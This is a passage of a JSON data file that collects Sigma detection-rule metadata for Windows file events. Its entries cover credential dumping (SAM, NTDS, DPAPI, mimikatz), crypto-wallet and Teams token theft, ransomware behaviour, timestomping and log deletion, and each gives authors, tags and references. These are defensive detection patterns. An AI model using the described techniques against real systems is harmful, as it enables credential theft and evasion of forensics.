"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fcc6d700-68d9-4241-9a1a-06874d621b06", "value": "Suspicious File Created Via OneNote Application" }, { "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate macro files downloaded from the internet", "Legitimate macro files sent as attachments via emails" ], "filename": "file_event_win_office_macro_files_downloaded.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "value": "Office Macro File Download" }, { "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn its default mode, it builds a self-deleting .bat file which executes a malicious command.\nThe detection rule relies on the creation of the malicious bat file (debug.bat by default).\n", "meta": { "author": "Subhash Popuri (@pbssubhash)", "creation_date": "2021-08-21", "falsepositive": [ "Any powershell script that creates bat files" ], "filename": "file_event_win_hktl_powerup_dllhijacking.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", "value": "HackTool - Powerup Write Hijack DLL" }, { "description": "Detects the creation of a file by the \"node.exe\" process in the \".vscode-server\" directory. 
Could be a sign of remote file creation via VsCode tunnel feature\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_vscode_tunnel_remote_creation_artefacts.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "56e05d41-ce99-4ecd-912d-93f019ee0b71", "value": "Visual Studio Code Tunnel Remote File Creation" }, { "description": "Detects the creation of new files with the \".evtx\" extension in non-common or non-standard location.\nThis could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.\nNote that backup software and legitimate administrator might perform similar actions during troubleshooting.\n", "meta": { "author": "D3F7A5105", "creation_date": "2023-01-02", "falsepositive": [ "Administrator or backup activity", "An unknown bug seems to trigger the Windows \"svchost\" process to drop EVTX files in the \"C:\\Windows\\Temp\" directory in the form \"_.evtx\". 
See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files" ], "filename": "file_event_win_create_evtx_non_common_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "value": "EVTX Created In Uncommon Location" }, { "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Legitimate use of the profile by developers or administrators" ], "filename": "file_event_win_susp_vscode_powershell_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "value": "VsCode Powershell Profile Modification" }, { "description": "Detects default file 
names outputted by the BloodHound collection tool SharpHound", "meta": { "author": "C.J. May", "creation_date": "2022-08-09", "falsepositive": [ "Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise" ], "filename": "file_event_win_bloodhound_collection.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002", "attack.t1482", "attack.t1069.001", "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", "value": "BloodHound Collection Files" }, { "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged 
in to a local file", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_nppspy.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://twitter.com/0gtweet/status/1465282548494487554", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "value": "HackTool - NPPSpy Hacktool Usage" }, { "description": "Detects ransomware creating a txt file on the user's Desktop", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_desktop_txt.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "value": "Suspicious Creation TXT File in User Desktop" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by 
application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_gotoopener_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "value": "GoToAssist Temporary Installation Artefact" }, { "description": "Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).\nUsually this technique is used to achieve DLL hijacking.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "creation_date": "2022-12-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_create_non_existent_dlls.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc", 
"https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "value": "Creation Of Non-Existent System DLL" }, { "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_perflogs_susp_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b", "value": "Suspicious File Created In PerfLogs" }, { "description": "Detects the creation of files in a specific location by ScreenConnect RMM.\nScreenConnect has feature to remotely execute binaries on a target machine. 
These binaries will be dropped to \":\\Users\\\\Documents\\ConnectWiseControl\\Temp\\\" before execution.\n", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect" ], "filename": "file_event_win_remote_access_tools_screenconnect_remote_file.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0afecb6e-6223-4a82-99fb-bf5b981e92a5", "value": "Remote Access Tool - ScreenConnect Temporary File" }, { "description": "Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_exfil_tools.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "value": "NTDS Exfiltration Filename Patterns" }, { "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Rare cases of administrative activity" ], "filename": "file_event_win_sam_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/FireFart/hivenightmare", "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934", "https://github.com/search?q=CVE-2021-36934", "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "value": "Potential SAM Database Dump" }, { "description": "Detects file renames where the target filename uses an uncommon double extension. 
Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.", "meta": { "author": "frack113", "creation_date": "2022-07-16", "falsepositive": [ "Backup software" ], "filename": "file_rename_win_ransomware.yml", "level": "medium", "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "value": "Suspicious Appended Extension" }, { "description": "Detects file access requests to the Windows Data Protection API Master keys by an uncommon application.\nThis can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_dpapi_master_key_access.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", "value": "Access To Windows DPAPI Master Keys By Uncommon Applications" }, { "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-11", "falsepositive": [ "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." 
], "filename": "file_access_win_susp_credential_manager_access.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml" ], "tags": [ "attack.t1003", "attack.credential-access" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "value": "Credential Manager Access By Uncommon Applications" }, { "description": "Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.", "meta": { "author": "frack113", "creation_date": "2023-12-21", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_gpo_files.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_gpo_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d51694fe-484a-46ac-92d6-969e76d60d10", "value": "Access To Potentially Sensitive Sysvol Files By Uncommon Applications" }, { "description": "Detects file access requests to crypto currency files by uncommon processes.\nCould indicate potential attempt of crypto currency wallet stealing.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2024-07-29", "falsepositive": [ "Antivirus, Anti-Spyware, Anti-Malware Software", "Backup 
software", "Legitimate software installed on partitions other than \"C:\\\"", "Searching software such as \"everything.exe\"" ], "filename": "file_access_win_susp_crypto_currency_wallets.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml" ], "tags": [ "attack.t1003", "attack.credential-access" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f41b0311-44f9-44f0-816d-dd45e39d4bc8", "value": "Access To Crypto Currency Wallets By Uncommon Applications" }, { "description": "Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.\n", "meta": { "author": "@SerkinValery", "creation_date": "2024-07-22", "falsepositive": [ "Unknown" ], "filename": "file_access_win_teams_sensitive_files.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65744385-8541-44a6-8630-ffc824d7d4cc", "value": "Microsoft Teams Sensitive File Access By Uncommon Applications" }, { "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of 
credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "file_access_win_susp_credhist.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_credhist.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", "value": "Access To Windows Credential History File By Uncommon Applications" }, { "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Changes made to or by the local NTP service" ], "filename": "file_change_win_2022_timestomping.yml", "level": "high", "logsource.category": "file_change", "logsource.product": "windows", "refs": [ "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" ], "tags": [ "attack.t1070.006", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "value": "File Creation Date Changed to Another Year" }, { "description": "Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "file_change_win_unusual_modification_by_dns_exe.yml", "level": "high", "logsource.category": "file_change", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "value": "Unusual File Modification by dns.exe" }, { "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Cedric MAURUGEON", "creation_date": "2021-09-29", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_prefetch.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"0a1f9d29-6465-4776-b091-7f43b26e4c89", "value": "Prefetch File Deleted" }, { "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Legitimate usage" ], "filename": "file_delete_win_delete_backup_file.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", "value": "Backup Files Deleted" }, { "description": "Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "value": "Unusual File Deletion by Dns.exe" }, { "description": "Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.\n", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2024-09-03", "falsepositive": [ "Some false positives are to be expected from uninstallers." ], "filename": "file_delete_win_delete_own_image.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_own_image.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "value": "Process Deletion of Its Own Executable" }, { "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-16", "falsepositive": [ "During uninstallation of the IIS service", "During log rotation" ], "filename": "file_delete_win_delete_iis_access_logs.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", "value": "IIS WebServer Access Logs Deleted" }, { "description": "Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-04", "falsepositive": [ "Other third party applications not listed." ], "filename": "file_delete_win_zone_identifier_ads_uncommon.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3109530e-ab47-4cc6-a953-cac5ebcc93ae", "value": "ADS Zone.Identifier Deleted By Uncommon Application" }, { "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron 